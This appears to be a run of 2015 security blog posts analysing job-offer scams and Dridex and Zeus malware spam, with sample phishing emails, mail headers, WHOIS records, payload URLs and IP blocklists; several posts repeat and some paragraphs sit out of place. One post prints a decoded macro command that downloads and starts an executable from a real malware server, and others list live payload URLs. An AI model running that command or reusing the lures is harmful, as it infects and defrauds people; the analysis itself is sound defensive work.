This spam email for a fake (and illegal) job is soliciting replies to ukhomejob.com. It is part of a nework of fraudulent domains, attempting to recruit victims into money laundering and other illegal activities.
This is related to this scam. Now though the IP used to receive emails is a Comcast IP of 98.221.25.74. The following domains are also related and are all fraudulent:
globbalpresence.com
recognizettrauma.net
gbearn.com
comercioes.com
eurohomejob.com
fastestrades.com
usaearns.com
idhomejob.com
ukhomejob.com
eurhomejob.com
The most likely "job" is money laundering, typically moving money out of stolen bank accounts and then passing on to someone in Eastern Europe. This activity is illegal, and there is a chance that you'll end up in jail at worst, or having to repay back the stolen money at best. Avoid.
From: Victim
To: Victim
Date: 1 March 2015 at 22:09
Subject: Advice
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on hermie@ukhomejob.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
This is related to this scam. Now though the IP used to receive emails is a Comcast IP of 98.221.25.74. The following domains are also related and are all fraudulent:
globbalpresence.com
recognizettrauma.net
gbearn.com
comercioes.com
eurohomejob.com
fastestrades.com
usaearns.com
idhomejob.com
ukhomejob.com
eurhomejob.com
The most likely "job" is money laundering, typically moving money out of stolen bank accounts and then passing on to someone in Eastern Europe. This activity is illegal, and there is a chance that you'll end up in jail at worst, or having to repay back the stolen money at best. Avoid.
Labels:
Job Offer Scams,
Spam
Saturday, 28 February 2015
Fake job offer: tradeconstruction.co.uk, spoofing the legitimate Trade Construction Company LLC
This fake job offer claimed to be from a UK-based company called Trade Construction Company LLC using a website at tradeconstruction.co.uk. However, no such company exists in the UK, and this is a rip-off of a wholly legitimate US firm that is actually called Trade Construction Company LLC who are not involved in this scam at all.
The tradeconstruction.co.uk site is almost a bit-by-bit copy of the genuine tradeconstruction.com website.
The difference in content is minimal, but the fake site contains the following contact details:
The fax number is invalid for the UK, and is actually just copied-and-pasted from the genuine site. The telephone number +447990402584 (07990 402584) is valid for the UK but it's a mobile phone number (possibly an untraceable prepay handset) so it could be anywhere.
As I said before, there is no company in the UK called Trade Construction Company and "LLC" is not a recognised type of UK company (typically they would be "Ltd", "PLC" or "LLP").
The WHOIS details for the domain are incomplete and unverified:
Domain name:
tradeconstruction.co.uk
Registrant:
tradeconstruction
Registrant type:
Unknown
Registrant's address:
SOUTH ROAD
ERDINTON
BIRMINGHAM
Birmingham
B23 6EL
United Kingdom
Data validation:
Registrant name and address awaiting validation
This is a residential area of Birmingham in the UK, but there is no house number and "Erdington" is spelled incorrectly. It certainly doesn't match the other contact addresses given.
Let's have a look at the mail headers to see if we can determine where this email actually came from.
NetRange: 172.245.45.0 - 172.245.45.31
CIDR: 172.245.45.0/27
NetName: CC-172-245-45-0-27
NetHandle: NET-172-245-45-0-1
Parent: CC-14 (NET-172-245-0-0-1)
NetType: Reallocated
OriginAS: AS36352
Organization: naa (NAA-21)
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/net/NET-172-245-45-0-1
OrgName: naa
OrgId: NAA-21
Address: 530 W. 6th Street Suite 901
City: Los Angeles
StateProv: CA
PostalCode: 90014
Country: US
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/org/NAA-21
OrgAbuseHandle: BRBA-ARIN
OrgAbuseName: Baker, Rusdi bin abu
OrgAbusePhone: +1-940-238-5499
OrgAbuseEmail: rusdi.bin.abu.bakar@gmail.com
OrgAbuseRef: http://whois.arin.net/rest/poc/BRBA-ARIN
OrgTechHandle: BRBA-ARIN
OrgTechName: Baker, Rusdi bin abu
OrgTechPhone: +1-940-238-5499
OrgTechEmail: rusdi.bin.abu.bakar@gmail.com
OrgTechRef: http://whois.arin.net/rest/poc/BRBA-ARIN
Note that this isn't saying that this "Rusdi bin abu Bakar" is sending the email, but a customer of theirs is.
Nothing about this job offer is legitimate. It does not come from who it appears to come from and should be considered to be a scam, and avoided.
From: JOB ALERT [klakogroups@gmail.com]
Reply-To: klakogroups@gmail.com
To: Recipients [klakogroups@gmail.com]
Date: 27 February 2015 at 18:37
Subject: NEW JOB VACANCIES IN LONDON.
Trade Construction Company,
L.L.C,
70 Gracechurch Street.
EC3V 0XL, London. UK
We require the services of devoted and hardworking workers, who are ready to work after undergoing enlistment training. in all sectors
as The Trade Construction Company Management intends to increase its man power base due to increasing number of customers and contract in the Company.
Available Positions
QUANTITY SURVEY, HEALTH EDUCATOR,CIVIL ENGINEER, FIELD SURVEY SUPERVISION, WELDER,MACHINES SUPERVISOR, MECHINARY OPERATOR,
CHEMICAL ENGINEER, AUTOMOTIVE MECHANIC, DESK OFFICER, ELECTRICAL ENGINEER, CONFERENCE & BANQUETING OPERATIONS MANAGER,
STORE KEEPER,ACCOUNT MANAGER, CASHIER, ASSISTANT MANAGER OF FRONT OFFICE, RECEPTIONIST, CLEANER, FOREIGN/INTERNATIONAL LANGUAGE INTERPRETERS,
MARKETING ASSISTANT, COMPUTER OPERATOR, INTERNET SERVICE EXPERT, SECURITY PERSONNEL, HR ASSISTANT,
The Company Management would be responsible to pay for your Flight Ticket and Accommodation.
All other information about benefits which would be received by new employees would be given in their application process.
So if interested, kindly send your CV/Resume via email to recruitment@tradeconstruction.co.uk
You can also apply directly at.
http://www.tradeconstruction.co.uk/apply_online.html
website: http://www.tradeconstruction.co.uk
Phone: +447990402584
The tradeconstruction.co.uk site is almost a bit-by-bit copy of the genuine tradeconstruction.com website.
The difference in content is minimal, but the fake site contains the following contact details:
Office Address:These are actually the contact details for XL Insurance, who are obviously completely unconnected to this scam.
TRADE Company House
70 Gracechurch Street London
EC3V 0XL
United Kingdom
Phone: +447990402584
Shop Addresses:
Office 208
3 Brindley Place
Birmingham, West Midlands
B1 2JB
United Kingdom
Fax: 225-658-8067
The fax number is invalid for the UK, and is actually just copied-and-pasted from the genuine site. The telephone number +447990402584 (07990 402584) is valid for the UK but it's a mobile phone number (possibly an untraceable prepay handset) so it could be anywhere.
As I said before, there is no company in the UK called Trade Construction Company and "LLC" is not a recognised type of UK company (typically they would be "Ltd", "PLC" or "LLP").
The WHOIS details for the domain are incomplete and unverified:
Domain name:
tradeconstruction.co.uk
Registrant:
tradeconstruction
Registrant type:
Unknown
Registrant's address:
SOUTH ROAD
ERDINTON
BIRMINGHAM
Birmingham
B23 6EL
United Kingdom
Data validation:
Registrant name and address awaiting validation
This is a residential area of Birmingham in the UK, but there is no house number and "Erdington" is spelled incorrectly. It certainly doesn't match the other contact addresses given.
Let's have a look at the mail headers to see if we can determine where this email actually came from.
Received: from mx.giki.edu.pk (mx.giki.edu.pk [121.52.146.229])We can definitely say that this email spent a while bouncing around the Ghulam Ishaq Khan Institute of Engineering Sciences and Technology in Pakistan. It appears that it originated from a server at 172.245.45.23 which is a ColoCrossing IP suballocated to:
by [redacted] (Postfix) with ESMTP id 91B60ED199
for [redacted]; Sat, 28 Feb 2015 06:29:19 +0000 (UTC)
X-ASG-Debug-ID: 1425104952-04b09a633509b40001-Ozk3QL
Received: from mail.giki.edu.pk (mail.giki.edu.pk [121.52.146.226]) by mx.giki.edu.pk with ESMTP id 6NnzvLRyt5l62CxM; Sat, 28 Feb 2015 11:29:12 +0500 (PKT)
X-Barracuda-Envelope-From: klakogroups@gmail.com
X-Barracuda-Apparent-Source-IP: 121.52.146.226
Received: from localhost (localhost.localdomain [127.0.0.1])
by mail.giki.edu.pk (Postfix) with ESMTP id 1127A11414ED;
Sat, 28 Feb 2015 06:42:31 +0500 (PKT)
Received: from mail.giki.edu.pk ([127.0.0.1])
by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10032)
with ESMTP id m27tNjcw-XxF; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from localhost (localhost.localdomain [127.0.0.1])
by mail.giki.edu.pk (Postfix) with ESMTP id 9E5A111414D7;
Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
X-Virus-Scanned: amavisd-new at mail.giki.edu.pk
Received: from mail.giki.edu.pk ([127.0.0.1])
by localhost (mail.giki.edu.pk [127.0.0.1]) (amavisd-new, port 10026)
with ESMTP id n3YhjtqX2niQ; Sat, 28 Feb 2015 06:42:30 +0500 (PKT)
Received: from [172.245.45.23] (unknown [172.245.45.23])
by mail.giki.edu.pk (Postfix) with ESMTPSA id 214E611414ED;
Sat, 28 Feb 2015 06:42:23 +0500 (PKT)
NetRange: 172.245.45.0 - 172.245.45.31
CIDR: 172.245.45.0/27
NetName: CC-172-245-45-0-27
NetHandle: NET-172-245-45-0-1
Parent: CC-14 (NET-172-245-0-0-1)
NetType: Reallocated
OriginAS: AS36352
Organization: naa (NAA-21)
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/net/NET-172-245-45-0-1
OrgName: naa
OrgId: NAA-21
Address: 530 W. 6th Street Suite 901
City: Los Angeles
StateProv: CA
PostalCode: 90014
Country: US
RegDate: 2013-06-07
Updated: 2013-06-07
Ref: http://whois.arin.net/rest/org/NAA-21
OrgAbuseHandle: BRBA-ARIN
OrgAbuseName: Baker, Rusdi bin abu
OrgAbusePhone: +1-940-238-5499
OrgAbuseEmail: rusdi.bin.abu.bakar@gmail.com
OrgAbuseRef: http://whois.arin.net/rest/poc/BRBA-ARIN
OrgTechHandle: BRBA-ARIN
OrgTechName: Baker, Rusdi bin abu
OrgTechPhone: +1-940-238-5499
OrgTechEmail: rusdi.bin.abu.bakar@gmail.com
OrgTechRef: http://whois.arin.net/rest/poc/BRBA-ARIN
Note that this isn't saying that this "Rusdi bin abu Bakar" is sending the email, but a customer of theirs is.
Nothing about this job offer is legitimate. It does not come from who it appears to come from and should be considered to be a scam, and avoided.
Labels:
Job Offer Scams,
Pakistan,
Spam
Friday, 27 February 2015
Malware spam: "Dennys Invoice INV650988" / "accounts@dennys.co.uk"
This fake invoice email is not from Dennys but is a simple forgery with a malicious attachment. Dennys are not sending the spam, and their systems have not been compromised in any way.
http://hew.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57.
According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:
http://apartmentprofile.su/conlib.php
http://paczuje.cba.pl/java/bin.exe
It drops several files, KB2896~1.EXE [VT 3/57], edg2.exe [VT 3/57] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday). (If you have a Malwr account you can download a copy of everthing from here)
Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:
198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)
Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119
From: accounts@dennys.co.ukSo far I have only seen a single sample, with an attachment INV650988.doc which has a VirusTotal detection rate of exactly zero. This contains this malicious macro [pastebin] which downloads another component from the following location:
Date: 27 February 2015 at 09:14
Subject: Dennys Invoice INV650988
To view the attached document, you will need the Microsoft Word installed on your system.
http://hew.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57.
According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:
http://apartmentprofile.su/conlib.php
http://paczuje.cba.pl/java/bin.exe
It drops several files, KB2896~1.EXE [VT 3/57], edg2.exe [VT 3/57] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday). (If you have a Malwr account you can download a copy of everthing from here)
Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:
198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)
Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119
Thursday, 26 February 2015
Malware spam: "Chris Christou [chris.christou@greysimmonds.co.uk]" / "Copy invoices"
This fake invoice spam comes with a malicious attachment:
It does NOT come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery.
I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:
http://xomma.net/js/bin.exe
This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)
This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119
From: Chris Christou [chris.christou@greysimmonds.co.uk]
Date: 26 February 2015 at 10:45
Subject: Copy invoices
Hello ,
Please find copy invoices attached as per our telephone conversation.
Kind regards,
Chris
Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel: 0845 130 9070
Fax: 0845 370 9071
Email: chris.christou@greysimmonds.co.uk
Web: www.greysimmonds.com
P “Think before you Print” - Please consider the environment before printing this e-mail
It does NOT come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery.
I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57] which contains this malicious macro [pastebin] which downloads a further component from:
http://xomma.net/js/bin.exe
This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56. Automated analysis tools [1] [2] show it attempting to phone home to the following IPs:
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)
This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57] and 1997b0031ad702c8347267db0ae65539 [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119
Wednesday, 25 February 2015
Malware spam: "Your LogMeIn Pro payment has been processed!"
This fake financial email does not come from LogMeIn, instead it has a malicious attachment:
http://junidesign.de/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:
92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MVTW in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104
UPDATE: a different version of the attachment [VT] uses this macro to download from:
http://jacekhondel.w.interia.pl/js/bin.exe
The payload is identical to the other variant.
From: LogMeIn.com [no_reply@logmein.com]Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:
Date: 25 February 2015 at 08:52
Subject: Your LogMeIn Pro payment has been processed!
Dear client,
Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.
Date : 25/2/2015
Amount : $999 ( you saved $749.75)
The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.
Thank you for choosing LogMeIn!
http://junidesign.de/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:
92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MVTW in this post. The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104
UPDATE: a different version of the attachment [VT] uses this macro to download from:
http://jacekhondel.w.interia.pl/js/bin.exe
The payload is identical to the other variant.
Malware spam: 'Info Chemicals shared "MT 103_PO_NO!014.zip" with you' uses Dropbox
This spam leads to a malware download via Dropbox.
In this case, the link in the email goes to:
https://www.dropbox.com/l/dFxVxjuDRo3j2oANVURy2v
and then to
https://www.dropbox.com/s/fnsprei93c45ts6/MT%20103_PO_NO!014.zip
Which leads to a malicious EXE file called MT 103_PO_NO!014.zip. Inside that is the malware itself, a file .pdf.scr which has a detection rate of 11/57. According to the Malwr report it drops another executable with a detection rate of 9/57. The payload looks similar to the Zeus trojan.
Also, according to Malwr and ThreatExpertit attempts to communicate with an apparent web-to-Tor gateway at
mmc65z4xsgbcbazl.onion.am
onion.am is hosted on 37.220.35.39 (YISP Colo, Netherlands) and I suggest this isn't the sort of thing that you want on your corporate network regardless of its legitimate uses.
Be aware that there are probably many other Dropbox locations in use for this spam run. If you see more, I suggest you forward the email to abuse -at- dropbox.com who are normally quite good at dealing with this sort of thing.
From: Info via DropboxThe email has been digitally signed by Dropbox (which means exactly nothing) and is spoofing the wholly legitimate Broad Oak Ltd who have been a target of this sort of thing several times before.
Reply-To: hcm0366@gmail.com
Date: 25 February 2015 at 05:38
Subject: Info Chemicals shared "MT 103_PO_NO!014.zip" with you
Signed by: dropbox.com
From Info:
"Good day ,
How are you today
pls check attached, my manager had requested I email you our new order details together with TT copy of balance payment. Kindly confirm in return.
regards,
Frank Manner
Broad Oak Ltd, Tiverton, Tiverton Way, Tiverton Business Park, Tiverton, Devon, EX16 6TG
Registered No. 1971053 England & Wales
Telephone: +44 (0) 1884 242626
Facsimile: +44 (0) 1884 242602
Disclaimer :
This electronic mail transmission may contain material that is legally privileged and confidential for the sole use of the intended recipient. Any review, reliance or distribution by others or forwarding without express permission is strictly prohibited. If you are not the intended recipient or the employee or agent responsible for delivery of this message to the intended recipient, you are hereby notified that any disclosure, copying, dissemination, distribution or taking any action in reliance on the contents of this information is strictly prohibited and may be unlawful. If you have received this communication in error, please notify the sender immediately by responding to this electronic mail and then delete all copies including any attachments thereto from your computer, disk drive, diskette, or other storage device or media.
Maritim Barito Perkasa does not accept any liability in respect of communication made by its employee that is contrary to company policy or outside the scope of employment of the individual concerned."
Click here to view
(Info shared these files using Dropbox. Enjoy!)
In this case, the link in the email goes to:
https://www.dropbox.com/l/dFxVxjuDRo3j2oANVURy2v
and then to
https://www.dropbox.com/s/fnsprei93c45ts6/MT%20103_PO_NO!014.zip
Which leads to a malicious EXE file called MT 103_PO_NO!014.zip. Inside that is the malware itself, a file .pdf.scr which has a detection rate of 11/57. According to the Malwr report it drops another executable with a detection rate of 9/57. The payload looks similar to the Zeus trojan.
Also, according to Malwr and ThreatExpertit attempts to communicate with an apparent web-to-Tor gateway at
mmc65z4xsgbcbazl.onion.am
onion.am is hosted on 37.220.35.39 (YISP Colo, Netherlands) and I suggest this isn't the sort of thing that you want on your corporate network regardless of its legitimate uses.
Be aware that there are probably many other Dropbox locations in use for this spam run. If you see more, I suggest you forward the email to abuse -at- dropbox.com who are normally quite good at dealing with this sort of thing.
Tuesday, 24 February 2015
Malware spam: "ArsenaL LTD" / "document do confirm" / "Izabela Pachucka [pachuckaizabela@arsenalltd.pl]"
ArsenaL LTD are a wholly legitimate Polish firm, but they are not sending out this email nor have their systems been compromised in any way. Instead, this is a simple forgery with a malicious attachment.
I have seen only a few samples, with an attachment roexport.xls or roexport.doc both of which are undetected by AV vendors [1] [2] and which contain two similar malicious macros [1] [2] which download another component from the following locaitons:
http://francis.behague.free.fr/js/bin.exe
http://dulcisinfundo.es/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe. The payload is identical to the one found in this earlier spam run.
From: Izabela Pachucka [pachuckaizabela@arsenalltd.pl]
Date: 24 February 2015 at 08:56
Subject: document do confirm
Dear customer
Attached plese find the invoice of January loading. Please sign it, stamp and send me back till Monday.
Thank You in advance
Izabela Pachucka
tel. +48-85-747-90-53
tel. +48 516 010 976
fax. +48-85-747-90-89
iza@arsenalltd.pl
--------------------------------------------------------
Arsenal LTD Spółka z ograniczoną odpowiedzialnością Spółka Komandytowa
15-688 Białystok ul.Przedzalniana 6H
wpisana do Krajowego Rejestru SÄ…dowego prowadzonego
przez Sąd Rejonowy dla m.Białystok ,XII Wydział Gospodarczy
pod KRS 0000367679 , o kapitale zakładowym w wysokości
PLN 15 000 000,00 , o numerze NIP:542-31-83-714,
numerze Regon:200392749
cid:image002.png@01D030AD.6E9AF970
Joanna Grudzińska
tel. +48-85-747-91-50
tel. kom. +48 885-852-835
grudzinskajoanna@arsenalltd.pl
--------------------------------------------------------
Arsenal LTD Spółka z ograniczoną odpowiedzialnością Spółka Komandytowa
15-688 Białystok ul.Przedzalniana 6H
wpisana do Krajowego Rejestru SÄ…dowego prowadzonego
przez Sąd Rejonowy dla m.Białystok ,XII Wydział Gospodarczy
pod KRS 0000367679 , o kapitale zakładowym w wysokości
PLN 15 000 000,00 , o nu
I have seen only a few samples, with an attachment roexport.xls or roexport.doc both of which are undetected by AV vendors [1] [2] and which contain two similar malicious macros [1] [2] which download another component from the following locaitons:
http://francis.behague.free.fr/js/bin.exe
http://dulcisinfundo.es/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe. The payload is identical to the one found in this earlier spam run.
Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"
This fake invoice is not from Berendsen UK Ltd but is a simple forgery. They are not sending out the spam and their systems have not been compromised in any way. Instead, this email has a malicious Word document attached.
http://heikehall.de/js/bin.exe
This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:
92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)
MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156
I have only seen one sample of this email, with a Word document IRN001549_60020918_I_01_01.doc which has a zero detection rate. Contained within this is malicious Word macro which downloads a component from the following location:
From: donotreply@berendsen.co.uk
Date: 24 February 2015 at 08:09
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 21st February.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you.
___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.
Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
http://heikehall.de/js/bin.exe
This binary has a VirusTotal detection rate of 2/57. Automated analysis tools [1] [2] [3] show that it attempts to phone home to:
92.63.87.13 (MWTV, Latvia)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
78.140.164.160 (Webazilla, US)
31.160.233.212 (KPN, Netherlands)
185.14.30.98 (UA Servers, Ukraine)
86.104.134.156 (One Telecom, Moldova)
MWTV have featured several times on this blog. A close examination of their 92.63.80.0/20 block indicates a mix of legitimate and illegitimate sites, however the bad sites are concentrated in the following ranges:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
In addition to this, the malware attempts to drop a Dridex DLL which is widely detected by AV vendors with a detection rate of 30/57.
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
5.196.241.196
66.110.179.66
202.44.54.5
78.140.164.160
31.160.233.212
185.14.30.98
86.104.134.156
Thursday, 19 February 2015
Malware spam: "State Department" / "Order state T/N:" with a hidden message
These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..
In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:
85.143.166.123
85.143.166.72
85.143.166.132
37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105
So I think I'm going to recommend blocking a couple of Pirix /24s at the end.
Anyway.
The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe which doesn't quite work as expected, because the .CAB file is already an .EXE file. Must the the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.
This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
According to the Malwr report, it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.
Update:
A second spam run is happening, with various senders and subjects, for example:
These are:
134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)
Payload is the same as before.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137
From: Hollie Wyatt , State Department
Date: 19 February 2015 at 12:13
Subject: Order state T/N:XZ3543_327
Your order is ready for collection at your chosen store.View full order details T/N:XZ3543_327 in attached document.
Thanks!
Hollie Wyatt .
PRAETORIAN RESOURCES LTD
----------
From: Jodi Russell , State Department
Date: 19 February 2015 at 12:16
Subject: Order state T/N:HD6061_902
Your order is ready for collection at your chosen store.View full order details T/N:HD6061_902 in attached document.
Thanks!
Jodi Russell .Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.
BARON OIL PLC
----------
From: Nathanial Mckinney , State Department
Date: 19 February 2015 at 13:26
Subject: Order state T/N:UH0141_809
Your order is ready for collection at your chosen store.View full order details T/N:UH0141_809 in attached document.
Thanks!
Nathanial Mckinney .
SIRIUS MINERALS PLC
In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a tradition type of meatball in gravy.
Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:
85.143.166.123
85.143.166.72
85.143.166.132
37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105
So I think I'm going to recommend blocking a couple of Pirix /24s at the end.
Anyway.
The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe which doesn't quite work as expected, because the .CAB file is already an .EXE file. Must the the intern again. Anyway, EXPAND simply copies the file from CAB to EXE so it still works.
This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:
82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
